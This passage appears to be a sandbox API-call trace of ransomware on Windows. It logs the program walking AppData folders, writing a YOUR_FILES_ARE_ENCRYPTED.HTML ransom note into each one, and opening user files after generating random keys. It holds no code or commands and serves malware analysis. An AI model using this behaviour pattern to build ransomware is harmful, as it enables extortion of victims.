ftCreationTime.dwLowDateTime=0xa92f2fe0, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa92f2fe0, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa92f2fe0, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60fcd4, dwReserved1=0x60fc60, cFileName="..", cAlternateFileName="")) returned 1 [0122.984] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa92f2fe0, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa92f2fe0, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa92f2fe0, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60fcd4, dwReserved1=0x60fc60, cFileName="..", cAlternateFileName="")) returned 0 [0122.984] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0122.984] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 95 [0122.984] GetProcessHeap () returned 0x600000 [0122.984] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0122.984] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\excel\\xlstart\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0122.985] WriteFile (in: hFile=0x324, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0122.987] CloseHandle (hObject=0x324) returned 1 [0122.987] GetProcessHeap () returned 0x600000 [0122.987] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0122.987] GetProcessHeap () returned 0x600000 [0122.987] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0122.987] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa92f2fe0, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa92f2fe0, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa92f2fe0, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f230, dwReserved1=0x0, cFileName="XLSTART", cAlternateFileName="")) returned 0 [0122.987] FindClose (in: hFindFile=0x6267b8 | out: hFindFile=0x6267b8) returned 1 [0122.987] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Excel\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 87 [0122.987] GetProcessHeap () returned 0x600000 [0122.987] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0122.987] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Excel\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\excel\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0122.988] WriteFile (in: hFile=0x308, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0122.989] CloseHandle (hObject=0x308) returned 1 [0122.990] GetProcessHeap () returned 0x600000 [0122.990] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0122.990] GetProcessHeap () returned 0x600000 [0122.990] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0122.991] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3cefc6a2, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0xff6176b4, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0122.991] StrStrIW (lpFirst="Internet Explorer", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.991] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer") returned 69 [0122.991] GetProcessHeap () returned 0x600000 [0122.991] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0122.992] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer" [0122.992] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*" [0122.992] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42ce6642, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42ce6642, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f230, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0122.993] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42ce6642, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42ce6642, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f230, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0122.993] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3fec53d2, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3fec53d2, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f230, dwReserved1=0x0, cFileName="Quick Launch", cAlternateFileName="QUICKL~1")) returned 1 [0122.993] StrStrIW (lpFirst="Quick Launch", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.993] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch") returned 82 [0122.993] GetProcessHeap () returned 0x600000 [0122.993] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6b47b0 [0122.995] lstrcpyW (in: lpString1=0x6b47b0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch" [0122.995] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*" [0122.995] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6654de95, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x6654de95, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3161f3c, dwReserved1=0x3161eb0, cFileName=".", cAlternateFileName="")) returned 0x626638 [0122.995] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6654de95, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x6654de95, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3161f3c, dwReserved1=0x3161eb0, cFileName="..", cAlternateFileName="")) returned 1 [0122.995] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3d053a9f, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d053a9f, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x9ee78381, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x94, dwReserved0=0x3161f3c, dwReserved1=0x3161eb0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0122.995] StrStrIW (lpFirst="desktop.ini", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.995] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini") returned 94 [0122.995] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0122.995] lstrlenW (lpString=".ini") returned 4 [0122.995] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0122.995] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0122.995] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\desktop.ini"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x320 [0122.996] GetFileSizeEx (in: hFile=0x320, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=148) returned 1 [0122.996] CloseHandle (hObject=0x320) returned 1 [0122.997] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6654de95, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x6654de95, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x6657eabb, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x51b, dwReserved0=0x3161f3c, dwReserved1=0x3161eb0, cFileName="Microsoft Outlook.lnk", cAlternateFileName="MICROS~1.LNK")) returned 1 [0122.997] StrStrIW (lpFirst="Microsoft Outlook.lnk", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.997] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Microsoft Outlook.lnk") returned 104 [0122.997] PathFindExtensionW (pszPath="Microsoft Outlook.lnk") returned=".lnk" [0122.997] lstrlenW (lpString=".lnk") returned 4 [0122.997] PathFindExtensionW (pszPath="Microsoft Outlook.lnk") returned=".lnk" [0122.997] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d053a9f, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d053a9f, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x251fff9e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x160, dwReserved0=0x3161f3c, dwReserved1=0x3161eb0, cFileName="Shows Desktop.lnk", cAlternateFileName="SHOWSD~1.LNK")) returned 1 [0122.997] StrStrIW (lpFirst="Shows Desktop.lnk", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.997] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk") returned 100 [0122.997] PathFindExtensionW (pszPath="Shows Desktop.lnk") returned=".lnk" [0122.997] lstrlenW (lpString=".lnk") returned 4 [0122.997] PathFindExtensionW (pszPath="Shows Desktop.lnk") returned=".lnk" [0122.997] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x3fec53d2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xad13dd79, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xad13dd79, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3161f3c, dwReserved1=0x3161eb0, cFileName="User Pinned", cAlternateFileName="USERPI~1")) returned 1 [0122.997] StrStrIW (lpFirst="User Pinned", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.997] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned") returned 94 [0122.997] GetProcessHeap () returned 0x600000 [0122.997] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6c47b8 [0122.998] lstrcpyW (in: lpString1=0x6c47b8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned" [0122.998] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\*" [0122.998] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x3fec53d2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xad13dd79, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xad13dd79, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19df88, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0122.998] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x3fec53d2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xad13dd79, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xad13dd79, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19df88, cFileName="..", cAlternateFileName="")) returned 1 [0122.998] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43708645, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43708645, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x43708645, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19df88, cFileName="ImplicitAppShortcuts", cAlternateFileName="IMPLIC~1")) returned 1 [0122.998] StrStrIW (lpFirst="ImplicitAppShortcuts", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.998] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts") returned 115 [0122.998] GetProcessHeap () returned 0x600000 [0122.998] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x670340 [0123.000] lstrcpyW (in: lpString1=0x670340, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts" [0123.000] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\*" [0123.000] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\*", lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43708645, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43708645, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x43708645, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f6176, dwReserved1=0x6f60b8, cFileName=".", cAlternateFileName="")) returned 0x626978 [0123.001] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43708645, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43708645, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x43708645, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f6176, dwReserved1=0x6f60b8, cFileName="..", cAlternateFileName="")) returned 1 [0123.001] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43708645, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43708645, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x43708645, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f6176, dwReserved1=0x6f60b8, cFileName="..", cAlternateFileName="")) returned 0 [0123.001] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0123.001] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 145 [0123.001] GetProcessHeap () returned 0x600000 [0123.001] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0123.004] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\implicitappshortcuts\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0123.012] WriteFile (in: hFile=0x318, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19de68, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19de68*=0x3c00, lpOverlapped=0x0) returned 1 [0123.014] CloseHandle (hObject=0x318) returned 1 [0123.017] GetProcessHeap () returned 0x600000 [0123.018] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0123.018] GetProcessHeap () returned 0x600000 [0123.018] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0123.018] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xad13dd79, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xad164063, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xad18a23e, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19df88, cFileName="TaskBar", cAlternateFileName="")) returned 1 [0123.019] StrStrIW (lpFirst="TaskBar", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.019] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar") returned 102 [0123.019] GetProcessHeap () returned 0x600000 [0123.019] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3340008 [0123.020] lstrcpyW (in: lpString1=0x3340008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar" [0123.020] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\*" [0123.020] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\*", lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xad13dd79, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xad164063, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xad18a23e, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f6176, dwReserved1=0x6f60b8, cFileName=".", cAlternateFileName="")) returned 0x6267b8 [0123.021] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x11, 